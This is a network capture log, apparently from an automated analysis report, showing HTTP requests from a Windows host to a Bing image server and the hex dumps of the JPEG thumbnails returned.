2024-11-21 08:53:48 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 527435 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 077C7B3174E34339BADFC2D19F4200A7 Ref B: EWR30EDGE1420 Ref C: 2024-11-21T08:53:48Z Date: Thu, 21 Nov 2024 08:53:48 GMT Connection: close
2024-11-21 08:53:48 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 36 3a 32 34 20 31 30 3a 34 31 3a 35 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:06:24 10:41:508C
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: 76 3b 50 c3 e6 cd 0a 30 d8 5e 94 80 17 70 e3 ef 1a 72 80 7e 94 9f c3 9f ef 52 b0 c2 d3 65 02 ee 1c 52 af 3c 52 37 a0 a5 f7 ef fc 54 93 6c 56 0c a8 6e 36 e7 fd aa 55 e5 69 57 95 a4 e7 76 0d 3d 86 1f ed ad 1d 3f cf dd a1 7e f7 fe cd 4a bf 77 1f c5 4c 03 e9 4a c3 fe 03 48 a0 1d be b4 0c 74 fc 29 75 01 77 92 d8 a1 78 6e 3f de f9 69 1b e5 5a 33 f3 71 f7 a8 b8 0b f7 b9 ef 4b 9f 97 23 a3 52 37 fd f5 4a e4 8e 28 b8 08 d9 dc bb a9 7f 8b e5 a4 5c 2a ff 00 ec bb 68 c8 e9 f8 d2 00 e7 6d 22 8a 7b 01 47 5f af 4a 13 01 17 8d d9 5a 5f fc 7a 86 c7 cd 9f fe 2a 91 89 eb f7 8d 3b 80 b9 ef fe 56 91 4a 7f b4 d4 70 7f da a3 9d bf 7b e5 a5 ea 03 98 0d d8 5f e1 a6 af 0d 8d cd 8a 4c e5 78 a7 72 3a ed f9 69 ec 02 60 1f e1 e2 96 93 de 93 18 a0 07 70 79 14 8d cf f0 f1 4e c7 6f c2 92 Data Ascii: v;P0^pr~ReR<R7TlVn6UiWv=?~JwLJHt)uwxn?iZ3qK#R7J(\hm"{G_JZ_z;VJp{_Lxr:i`pyNo
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: bf 7b 8e d5 b3 a7 cc 8b 71 73 05 aa ed b8 9e e6 38 ed a4 93 e6 55 df c7 23 da 8a b6 6d bf 4f c8 84 73 3e 12 8d ef 7c 45 e2 19 64 5f 2d ae 75 02 9f 6b dd f3 61 70 02 fd 05 6d f8 07 c2 d6 fa df 88 35 ab db 8b cf 35 63 95 6d bf e0 0a 39 00 d6 97 87 7c 0b 0e 8a da 82 6a 77 92 dd 15 99 ae a4 91 7e 5f 30 b0 fb b8 f4 ad 7f 03 5b db 68 7a 6b 5b db 7e e9 a4 b9 32 48 b2 7f 16 ee 7b d7 06 61 8a 7e ce 5e c9 ea ec 74 d1 8a 52 d4 e5 56 da cb c2 ba 5f f6 05 9a b3 4b 34 f3 3f 96 b1 fc ec 41 c8 e7 e9 53 69 b3 db e8 7a 1f da 20 59 16 e3 52 69 27 bb 5f 30 b3 65 53 f8 bf 95 5a d6 31 1f 89 ae b5 19 1d b7 48 db be 5f bb e5 8e e7 d3 9a a1 a1 ea 0f 7d 7d 79 2d b5 b4 8d 14 8e 52 05 66 fb d9 18 63 9f 4a df 0f 29 54 a3 79 7c fc ee 45 58 a5 33 7f 43 b0 c4 36 b7 be 57 96 67 60 fe 5f Data Ascii: {qs8U#mOs>\|Ed_-ukapm55cm9\|jw~_0[hzk[~2H{a~^tRV_K4?ASiz YRi'_0eSZ1H_}}y-RfcJ)Ty\|EX3C6Wg`_
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: 8c fe 75 e2 e2 22 9e 26 50 8f 73 78 fc 08 a9 e0 d9 34 68 7c 2f 67 a7 d9 c4 df 6a 92 38 f6 b4 8d b7 72 7a 8f 7a 5d 49 0a 78 fb 4b f2 96 35 b7 56 6f 3e 3d bf eb 01 e3 26 aa 69 36 33 c7 1e 9f 6f 14 51 cb 25 ac 51 a6 ee 7a e3 9e b5 bb 36 9f 6f 6f ad 5d 4b 3e e9 64 8a 35 f2 db fb bc 73 fa d2 4d a9 f3 32 5b 56 d0 e8 34 9b 8f b3 fd a5 2d ac d5 a2 56 26 3f 2f f8 81 ae 5b e2 a4 09 a8 78 ab 4c 9e 35 f3 25 d3 e3 dc d1 af cc d8 6f 6a d9 f0 9e ad 64 ba 7d cc ff 00 ea e1 8d 43 79 8d f2 ae 2b 37 4b 8e 39 7c 59 3d c3 ce d2 ef 8f 7e e6 6f e0 cf 18 f6 a7 f0 cd b2 56 c6 5f c3 d8 5a 6b cb eb b9 25 db 23 5c ae d6 5e b1 ff 00 0e 3f 1a 8b e3 96 0c da 4e 87 04 9b 56 68 a7 3f 32 ee db c0 1f 85 37 4d 7b cb 3f 12 6a f6 91 2c 6c 23 9d 76 b3 7c ad b3 a8 fa f3 de b9 bf 8d 9a dd cc 6b Data Ascii: u"&Psx4h\|/gj8rzz]IxK5Vo>=&i63oQ%Qz6oo]K>d5sM2[V4-V&?/[xL5%ojd}Cy+7K9\|Y=~oV_Zk%#\^?NVh?27M{?j,l#v\|k
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: f5 b6 da 0e 95 63 aa 45 67 14 f2 79 56 f6 5e 74 71 ee 3b 63 cf 07 3f 88 cd 58 86 d2 e2 cf c4 0b a7 47 2e dd 3e 28 97 f7 7b 76 b7 d2 b4 fc 48 fa 65 ae a1 6d 2f fa bf 2e 4f 22 47 db bb cc 8d c7 19 fa 35 6e f1 32 9a 4a 2f 4d d2 46 8e 2a 33 39 8f 13 5d 26 a9 1c 71 db dc ab 47 14 42 e6 3d cb c2 bc 47 71 1f 8d 69 7d a7 4f d6 b4 fd 33 c4 e9 13 7d 92 e7 1b a0 6f be a9 9f 9b 1f 43 5a 1a 5e 85 a7 c9 a7 fd 82 25 6f 32 46 23 6c 9c 7c 8d 58 ba 6d 98 4f 0a c9 e1 71 2e db 8f 0e dd ca 8a db 4a b7 96 5f 23 f4 c5 75 27 0a b1 d3 78 bf c1 ef fa 1c fc dc 93 b7 46 62 78 8b 5c 8a c7 e3 35 f3 d8 3c 77 d6 17 9a 5c 73 c4 df c3 1f 96 48 23 fd e1 d2 b6 ec 48 d4 1a 4b 8b b6 fb 08 e1 ed a7 66 0a 98 03 77 5f a5 70 8d 6f 73 aa eb 9a bd ce 94 ab ba 39 19 d7 77 de 68 d8 7c c0 7d 4e 6b 4e Data Ascii: cEgyV^tq;c?XG.>({vHem/.O"G5n2J/MF*39]&qGB=Gqi}O3}oCZ^%o2F#l\|XmOq.J_#u'xFbx\5<w\sH#HKfw_pos9wh\|}NkN
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: db 86 a0 a6 35 5f e2 fa e3 d2 b4 5b 4b 0f 6f 0c 90 fc aa b1 62 05 6f 95 54 f7 c7 a5 78 98 7a d1 78 78 fb b6 35 af 17 19 d9 6c 59 f0 7d cc b0 5f 6a 97 96 cd ff 00 1e d2 c4 24 8d be 55 df e5 e5 ab b7 f1 04 9f da 1e 1b 8a 38 a5 66 2a c0 4f b7 fe 5a 64 e4 8a e1 bc 29 34 f6 57 9a 94 57 76 cb f6 9b 8b e2 77 2c 7b d5 46 00 1c ff 00 ba 2b a5 b5 9a 55 d6 16 58 15 be c8 b9 dd 27 f7 9c fa 7a d6 55 af 76 cc 3a a6 6e 7f 6a 5b 26 9f 34 09 07 91 fb b1 1a c7 f7 97 91 c8 fc aa 85 d0 47 b1 82 29 2d b7 42 aa 13 cb 6f 97 a0 f9 6b 47 c1 96 8d ad 5b dc c4 d1 f9 71 47 3e 1d 99 7e f6 3a d6 97 8d 04 46 e2 48 51 55 63 8d 57 e6 db ca 9a f3 63 26 ae 99 a4 ad cc 8a 37 9a 75 a1 d1 e0 df 2e c6 8d 43 b2 ff 00 0a 9e c0 8a e6 35 4d 49 c4 3a 9c 57 31 6e 11 31 78 e3 5f bd f2 8e 0e 7d 2b a2 Data Ascii: 5_[KoboTxzxx5lY}_j$U8f*OZd)4WWvw,{F+UX'zUv:nj[&4G)-BokG[qG>~:FHQUcWc&7u.C5MI:W1n1x_}+
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: d3 b9 98 d9 0f cd f7 aa 36 f9 aa 5b 88 4a 33 26 d6 ce dc af d2 9b 14 5f 2a 83 46 83 b3 15 63 09 1a b9 fe 2a 66 dc 36 4d 59 91 48 b5 47 fe 1a 86 6c 3c 8a 07 f1 50 33 7f c2 f6 f2 4c d1 90 9c 37 1b a9 fe 26 b3 8a 0b e8 cc 9f c3 c3 7f b5 53 e8 64 c6 d6 de 5b 7c b1 a9 3f 2f ad 37 c4 52 89 95 67 1f bc 2a df 37 e5 53 1b 1a 34 ec 41 e1 75 0f ac 79 61 be 5a da b8 81 26 f1 54 96 92 6d db f6 6f 93 6f f1 67 d6 b0 bc 32 71 79 23 fc ab b6 3c af d6 b4 ee 96 49 2f 34 fb c9 77 61 d4 26 ef a1 a8 95 b9 8a 8e b1 2a de db 0b 75 68 8b ed 69 5b e5 ae 7a e1 11 78 1d 57 ef 57 5d ab 45 e7 dd 6e 09 f7 b3 f3 7d de 95 c8 49 18 3b 88 6d dd 6a a1 b1 35 37 25 b6 b9 61 a7 cf 03 37 0d 8d b5 02 ce 57 69 1f f0 2a 62 0c 46 d8 eb 4a f8 31 ad 5d ac 67 a8 d5 7c ee ff 00 6a 88 8e 1a a3 51 56 2d Data Ascii: 6[J3&_Fcf6MYHGl<P3L7&Sd[\|?/7Rg7S4AuyaZ&Tmoog2qy#<I/4wa&uhi[zxWW]En}I;mj57%a7Wi*bFJ1]g\|jQV-
2024-11-21 08:53:49 UTC	16065	IN	Data Raw: 26 90 a9 28 33 d2 34 7d 45 fc 95 72 dc d6 94 da 92 16 5f 9b 69 6a e0 6c 75 16 58 f2 8d fc 55 a1 6f a8 1d de 63 ed cf fb 55 e6 4b 03 77 b1 dd 0c 57 99 d6 2d f3 b6 e0 5b 9f ef 2d 39 e7 76 87 0b fc 5c 57 2b 0e a7 fb cc 86 db fd ea e8 b4 29 a2 b9 65 03 a7 fb 5f c3 5e 7d 5c 37 b3 d6 c7 a1 4e a2 9e 85 fd 1f 4e 4b 89 97 2b b8 ff 00 76 bb 5d 23 4b b7 f2 70 22 5f 33 fb d5 1f 87 74 e8 24 8d 64 8f e6 75 5f 99 9a ba 18 60 48 63 c8 65 cf 03 6d 70 54 c4 6b 63 78 e1 d2 d5 9c ee a9 a6 2c 2a c4 aa a8 e7 e6 ff 00 3d aa 9d 84 86 39 17 09 b8 56 f6 ab 1c 92 b3 06 6f bd fd da a3 6f 66 15 94 23 7d e5 f9 7f da ad e3 8a 97 b3 39 e7 45 73 96 22 9a 43 0e d0 bf 77 fb d5 07 db 90 37 97 fd e6 ff 00 38 a2 f1 80 8f 0f f2 ed e7 77 dd ac 99 26 2b 27 dd 6c 6e fb df e1 51 0a 31 ad 77 23 4f Data Ascii: &(34}Er_ijluXUocUKwW-[-9v\W+)e_^}\7NNK+v]#Kp"_3t$du_`HcempTkcx,*=9Voof#}9Es"Cw78w&+'lnQ1w#O
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: 98 c9 d7 ad 29 e2 91 47 de 34 07 42 f4 68 86 d5 4a aa a9 8e ad a8 8a e6 39 1c ab 29 55 02 b3 a3 1b b6 ef f9 42 fd ea d7 d2 41 37 0a 8a be 61 6f bc b5 8c dd 91 d1 4d 29 3b 1e 8f fb 3e f8 0a ff 00 c4 9e 26 b7 48 db cb b7 8e 51 f3 4e a5 93 d7 07 eb 5f 47 78 a3 4b d5 6f f4 b8 fc 39 71 67 05 8d ad e6 52 59 16 7d ec b1 af 65 1d b3 52 7e cf a9 67 65 f0 b5 ae 22 b6 58 ee 59 43 fe ef 0a dc 8f e9 5b 9e 24 b5 82 1b 58 25 92 e5 a5 ba 65 07 fb ac bf 4a fc af 36 cc ea 62 71 8e ea dc ba 2f f3 3e df 05 86 8d 0a 4a 2b a9 85 e1 5d 75 ed 6f 2d bc 31 7f 67 1c 52 b2 94 b1 66 61 99 a3 5f ee e3 ee b0 ae ef 55 b3 b4 fb 2b 61 bf 79 b8 79 ac df 4e f5 e4 5e 38 11 5a 7c 62 f0 1d c7 de b8 92 49 0c 91 c6 db b8 03 a9 fc 6b d1 75 5d 41 ee 19 92 e2 7d aa b9 1e 64 6b b9 7f 1a f9 3c e3 0e Data Ascii: )G4BhJ9)UBA7aoM);>&HQN_GxKo9qgRY}eR~ge"XYC[$X%eJ6bq/>J+]uo-1gRfa_U+ayyN^8Z\|bIku]A}dk<
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: dd bb 77 f1 55 1d 42 eb 74 2d 8e b5 24 08 ff 00 67 5f 55 5f 9a a8 6a 29 21 e4 d6 54 70 f1 45 d4 ad 27 a1 89 73 71 b6 66 cf f7 aa 37 92 49 38 45 dd 53 dc c0 1e 6a b5 a7 da 63 e6 2a ad fd da eb bc 52 32 d7 a9 42 1b 49 25 6c b6 ea d9 d1 f4 ad cb 83 b9 42 ff 00 15 5a b0 81 e4 93 68 5d df 37 cb 5b 16 b6 ed 14 8b 24 ab b6 b9 eb 55 76 2e 11 f7 89 ac 74 fd 91 ff 00 bb 8d b5 7d 2c f3 c9 65 50 dc 35 1e 72 ae dc b2 fc bf f0 1a d0 d3 c9 95 97 1f 30 6f e1 ef 5e 35 46 d9 d9 15 b1 9f f6 39 11 78 f9 47 fb 35 5e fc 79 2b b7 ef 15 e3 fd aa ed be c6 64 85 49 89 70 bf ec d6 2e bd a7 3e d9 31 1f 1b 7f 87 ef 57 2d 35 29 4e cd 1b bb 46 27 9f 6a 97 6e 5b 03 73 0a a5 1e a5 2c 72 6c 45 5c ff 00 b5 5a 1a dd a4 b1 33 61 76 ee fe b5 4e c6 d4 b3 73 f2 8a f7 23 08 28 6a 8e 09 54 93 91 Data Ascii: wUBt-$g_U_j)!TpE'sqf7I8ESjc*R2BI%lBZh]7[$Uv.t},eP5r0o^5F9xG5^y+dIp.>1W-5)NF'jn[s,rlE\Z3avNs#(jT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49760	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:48 UTC	346	OUT	GET /th?id=OADD2.10239394186277_1DEATIZYUGUDBFQ4X&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-21 08:53:48 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 543350 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: DB100B5DE5EB403D8AF8830B9E5B8D13 Ref B: EWR311000102017 Ref C: 2024-11-21T08:53:48Z Date: Thu, 21 Nov 2024 08:53:47 GMT Connection: close
2024-11-21 08:53:48 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 36 3a 32 34 20 31 30 3a 34 32 3a 35 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:06:24 10:42:508C
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: 25 b6 ff 00 09 ae 6b 4f 92 49 a4 5b bb 99 fc c9 24 8c 08 be 5f bb 5a 1a b6 a6 b7 de 0f 7b 5b 69 63 69 1b f8 59 b9 51 55 74 fb 64 96 3b 18 56 5e 51 46 e6 f7 15 e3 ca fb ec 68 ae 6c f8 e3 7c 3e 18 49 04 4a db 57 2d f2 d7 8f 78 1f 49 46 f8 91 75 ac 98 16 4f b5 2e c8 fc cf f9 66 07 a5 7a cf c4 2b e9 61 f0 6d ca c1 17 9b b5 71 f3 57 9e 5c c0 91 ac 09 14 fe 53 79 41 d9 96 ba e9 4f 46 97 52 65 b1 d4 68 f6 f0 7d b9 e5 82 2f dd ab 7f 0f af 7a 87 58 8d e5 b1 bc 96 1b c5 8c 2a 92 cc cb b8 ae 2b 3f c0 ba 8b 98 67 80 af ee a3 97 fd 67 f7 aa fd d3 46 d7 93 db fe f2 0b 69 14 99 1b f8 5b 8a 87 75 2b 12 79 f6 8b 0b bf 83 e3 ba 77 59 e6 9e 56 1e 62 fd e9 00 3c 13 e9 5d 55 b5 f7 97 e1 96 8a f6 05 fb 47 95 e5 aa b3 6e dc 0f 43 58 3f 0d 60 47 b5 61 25 ca c7 6d 1d dc 82 36 fe Data Ascii: %kOI[$_Z{[iciYQUtd;V^QFhl\|>IJW-xIFuO.fz+amqW\SyAOFReh}/zX*+?ggFi[u+ywYVb<]UGnCX?`Ga%m6
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: d2 69 9d ec d3 58 6a 97 4d e4 32 f9 91 c3 f7 b7 77 14 57 39 66 74 cd 7f c3 36 ba 8e 86 cd 6b 75 1a e6 46 5f 6e b9 14 54 4a 9e bb fd e4 a6 7b c6 e0 8a d4 83 ef 64 6e fb b4 8a 0e df 6a 5c e5 b0 2b f6 f3 f3 d1 b1 80 db 55 fa 6e a7 bb 2e d6 ca d2 67 3d 28 7e 63 51 b7 76 df bd 48 07 31 01 bf de e6 9b 83 bb da 95 8e 17 05 bf f1 da 56 e3 83 b7 e6 5a 00 4f af dd dd 4a c3 72 ff 00 bb 43 70 df 73 fe 05 4d 4f 9f e9 fe d7 de a0 01 c6 79 1b a3 0d 44 23 77 08 df 7b ef 53 9d b3 1e c3 47 1b b1 df f8 68 bb 00 65 1d 13 e5 6f f6 a9 18 6e 65 03 fe 05 b6 9b bb e6 5f 4f ef 53 b2 83 72 7d ea 35 01 1b 95 c6 ef 96 8c 91 1e 3e ea ee a0 e1 64 de 57 ef 71 4e f9 4b 60 74 a3 40 11 5b 11 f1 d7 fb d4 9c 1e 47 4f f6 a9 50 fc bf 7b 85 a7 33 82 dc 7c a6 8d 00 45 1f 2e 7e 6a 31 8d bf ed 52 Data Ascii: iXjM2wW9ft6kuF_nTJ{dnj\+Un.g=(~cQvH1VZOJrCpsMOyD#w{SGheone_OSr}5>dWqNK`t@[GOP{3\|E.~j1R
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: aa 2f 70 dc 4e 44 6c 3f bd 49 fc 3c 6e f9 68 60 e7 69 3d 29 ea 4f 5a 2e 08 37 1d b8 ed fe d2 d2 36 3a 8a 6b 00 23 ce de 5a 9c bb ff 00 d5 9e bf c5 40 83 23 6f fe cd 46 17 af 6a 72 b7 cb c7 fd f3 51 b8 c7 25 68 b8 ee 11 8f 9b ef 7d da 5c 7e f3 34 26 3b 75 fe 1a 56 de 38 7f 96 80 61 c0 eb ba 97 38 5e 3a 52 f2 5b 70 db 9a 8d d7 72 e4 75 a0 42 b1 c3 60 d3 59 58 2f 34 f6 cf cb e9 43 12 df fb 2d 03 d4 11 80 5f bb b8 d2 31 25 98 ed e6 97 04 74 eb 48 dc b6 de eb 40 6c 2b 7d ec bf cc 69 00 27 70 3f 29 5a 0f cb c7 dd dd 4e 66 4d d9 0b fc 34 00 8a 5c fc df 78 50 a7 0d cf cd 42 b6 77 7c b4 03 b7 6e 7e 63 ba 81 88 cc 5b 70 dc df 2d 1c 37 08 fc af f1 52 c9 bf f7 99 e9 fc 2d 43 10 16 80 11 82 7c d9 ea b4 bc 76 e9 48 8c 4a e7 b7 f1 35 2e 72 cc 07 4a 05 61 3f d5 f0 3e 61 Data Ascii: /pNDl?I<nh`i=)OZ.76:k#Z@#oFjrQ%h}\~4&;uV8a8^:R[pruB`YX/4C-_1%tH@l+}i'p?)ZNfM4\xPBw\|n~c[p-7R-C\|vHJ5.rJa?>a
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: c0 fa 55 c3 ea 4d e7 fc b6 f1 e4 c8 bf de 35 36 8a 23 b4 ba d4 23 8e 3e 16 73 b7 fb dc d6 9f 84 d5 62 85 ad 4c bb a4 fe 2f c6 b2 74 f3 a8 d8 78 93 52 8a ea 35 52 c8 1e 0d df c4 3d 6b 36 ba ad 05 d0 ae da ba 2e a0 d1 5b c0 cd 34 52 02 df dd e6 ba bd 4b 56 b6 86 ce 24 b8 65 8f cd 5c 7c cd eb 5c 06 ab 35 a5 bd d4 8c d2 ab 5c c8 a0 fc ab f7 8d 6e 6c 8b 51 d3 62 37 90 48 d2 2a 83 b5 97 e6 a2 71 56 42 8e 85 48 61 80 78 8a 08 d2 25 8d a4 62 77 53 be 31 40 2e 3c 17 bc fc b2 41 20 da d1 af cc be f5 0d e4 be 67 89 a0 93 ec cd 1c 36 d8 1b eb 7d a4 fb 7e 9b 7c ef 06 e8 95 7e eb 51 cd cb 28 b2 a2 72 5a 0a df cd a5 da ba 5c ab 47 b4 6d 56 fb dc 75 a8 fc 5d 7d 3b 6a 51 d9 69 d3 fc cf 11 f3 59 7e ee 00 ab 7a 04 f6 0d e1 db c4 29 b6 6b 69 08 8a 3f ba 5b e9 5c 6e 9f 16 a6 Data Ascii: UM56##>sbL/txR5R=k6.[4RKV$e\\|\5\nlQb7H*qVBHax%bwS1@.<A g6}~\|~Q(rZ\GmVu]};jQiY~z)ki?[\n
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: 96 ac 88 7c 39 a1 d9 4d 7c c6 5b 3e 7a ee 6f f1 ae a6 e6 4b 3b 2d 3f 1b bc b5 55 3b 59 7f 86 b1 75 bd 40 59 59 e4 4e cb b7 8d db 6b 8d b8 d7 cc 92 66 e2 e7 fd 1f 92 b5 9c 63 52 ad e4 3e 57 23 47 c5 de 23 b4 82 ce 77 4d d9 6e 15 bf 87 26 b8 07 f1 6d b6 8b 66 b1 d8 47 e7 dc 49 cb 49 fc 59 aa fe 33 d4 0e a0 cd 6f 1b 2b 47 bb e5 f2 e9 de 1d f0 f1 11 fd a2 58 3e 6d bf 2e ea f5 28 61 e9 53 a5 7a 9f 77 73 6e 5b 69 13 9c b8 4d 43 5c d6 15 ee 1d 95 77 6f f2 ab b2 b3 d3 2e 52 c6 38 a3 65 8c 2a e5 bb 9a a5 a0 d8 4b 37 88 25 b9 75 f2 e3 8d 4e e6 dd 5d 55 8d b7 9d 63 28 89 b7 22 fc bb 97 fc 68 c6 62 2c 92 5a 24 6b 18 f2 a7 dc bd f0 ba df cd f3 22 1b 99 b7 7d e9 3a 57 71 7d 66 e9 0a c7 25 ca e7 70 f9 ab 99 f8 76 a9 61 fb c9 1b 69 91 be 58 ff 00 bd ef 5d 7e ac 0f 92 d7 Data Ascii: \|9M\|[>zoK;-?U;Yu@YYNkfcR>W#G#wMn&mfGIIY3o+GX>m.(aSzwsn[iMC\wo.R8e*K7%uN]Uc("hb,Z$k"}:Wq}f%pvaiX]~
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: a6 92 c2 e2 e2 5b ef 37 7a fe f1 72 df de ac ac d4 ae d6 82 43 b5 6d 62 d2 2d 36 7b 79 e2 f3 25 56 c2 ad 63 db 5a 45 2e 82 d2 5c c1 e6 36 ef 95 7d ab 7e 1d 3d 2f fe d2 52 05 66 db fc 4b 50 78 7e 34 86 c6 f2 2b 8f 98 46 a4 2f fb 54 e2 b4 b2 0e 62 b5 d6 87 69 0c 31 dd 85 fd c4 91 fc cb f7 96 b1 7e 17 dc ea 16 9a b6 a9 79 67 02 ad 9c 13 ec 6f a5 77 7e 19 b1 49 bc 33 1c 52 6e c3 67 ef 57 3b f0 fe 2b 7d 3a 6f 11 c1 33 7c ad 3f dd f6 c5 6d 0d 54 95 f5 1e c8 d8 f8 95 ae e9 17 fa 3c 5a 75 b5 ca cb 71 24 80 b2 c7 f7 96 b1 92 d6 3b 2d 06 79 e3 dc cb 24 67 72 ff 00 13 55 0f 17 1d 0f 4a f1 26 91 28 65 80 5d 29 46 93 de 9d e2 2f 18 e8 76 d0 ad a2 dc c7 94 e1 b7 35 68 a9 56 95 9c 63 a1 3e ec 56 e4 9e 07 6f b2 b5 b2 4a dc f5 db fc 5c f6 ad 6b fb 40 bf 11 a3 b8 1f 76 e6 Data Ascii: [7zrCmb-6{y%VcZE.\6}~=/RfKPx~4+F/Tbi1~ygow~I3RngW;+}:o3\|?mT<Zuq$;-y$grUJ&(e])F/v5hVc>VoJ\k@v
2024-11-21 08:53:49 UTC	16067	IN	Data Raw: 86 cd 76 33 66 46 f9 bf bb 59 de 26 08 63 52 9f 31 59 0d 5c b8 50 9a 7a 84 97 f8 72 cb ef 59 77 13 a3 da a8 dd ca ff 00 7a 85 51 17 ec da 46 65 c3 f9 8c cd b7 6e da e8 34 f6 92 3d 05 5c 7c a5 97 3b bf bd 5c f2 ec f3 1a 3d d5 d0 e9 f6 f2 3e 93 b8 7c c3 6d 29 bd 05 08 b4 c4 f1 32 bc d1 da dc c8 bb 43 47 8a d2 b6 01 74 34 8f 72 b4 6c bf ad 3f 5b 86 05 f0 7a c8 55 77 44 a0 af d7 d2 a8 e9 2f e6 f8 7e 39 f6 ed f2 db fe fa a5 ca ed a1 49 ab 95 67 84 bb 49 18 89 b6 b7 fd f3 5c cc 91 0f 31 80 fe f1 ae ad ae f1 70 c8 eb b4 4b 5c c4 d1 88 2f a5 8f ef 6d 6f bd 57 1d 8c a4 ca 93 21 0d 4e da 16 15 c7 56 a7 5d 0c b6 47 4a 66 ef 96 a8 8d 87 c3 cc 2c 2a 29 97 0b f7 a9 f0 a9 2a c4 74 5f bd 4c fb db b3 40 2d 88 94 77 a7 aa e5 b0 29 d6 f1 99 1b 62 75 ab 31 5a 48 97 0a 19 79 Data Ascii: v3fFY&cR1Y\PzrYwzQFen4=\\|;\=>\|m)2CGt4rl?[zUwD/~9IgI\1pK\/moW!NV]GJf,)t_L@-w)bu1ZHy
